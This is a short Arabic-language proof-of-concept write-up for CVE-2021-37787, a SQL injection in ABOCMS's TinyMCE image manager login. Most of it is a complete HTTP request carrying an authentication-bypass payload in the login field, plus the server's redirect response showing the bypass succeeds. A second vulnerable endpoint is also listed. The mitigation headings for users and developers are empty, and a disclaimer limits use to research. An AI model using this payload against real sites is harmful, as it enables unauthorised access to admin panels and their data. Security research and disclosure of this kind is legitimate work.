
CVE-2021-37787
توجد ثغرة حرجة في حقن SQL في ABOCMS ضمن وحدة TinyMCE. تنشأ الثغرة نتيجة عدم كفاية تعقيم المدخلات في تفاعل وحدة TinyMCE مع قاعدة البيانات، مما يسمح للمهاجم بحقن استعلامات SQL خبيثة. قد يؤدي ذلك إلى وصول غير مصرح به إلى البيانات، أو تعديلها، أو حتى اختراق كامل لقاعدة البيانات الأساسية.
تقع نقطة النهاية المعرضة للخطر في معالجة وحدة TinyMCE للمدخلات المقدمة من المستخدم. يمكن للمهاجم استغلال هذا الخلل لتنفيذ أوامر SQL عشوائية.
POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1
Host: <yourdomain.name>
Content-Type: application/x-www-form-urlencoded
return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login
HTTP/1.1 302 Found
Server: nginx-reuseport/1.21.1
Date: <date>
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)
location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html
يمكن استغلال الثغرة عبر نقطة النهاية التالية:
/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php /js/admin/tiny_mce/plugins/filemanager/login_session_auth.php
للمستخدمين:
للمطورين:
يُقدَّم إثبات المفهوم (PoC) هذا لأغراض تعليمية وبحث أمني فقط. لا تستخدم هذا الكود لإلحاق الضرر بالأنظمة أو الشبكات دون إذن صريح من المالك. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الإثبات.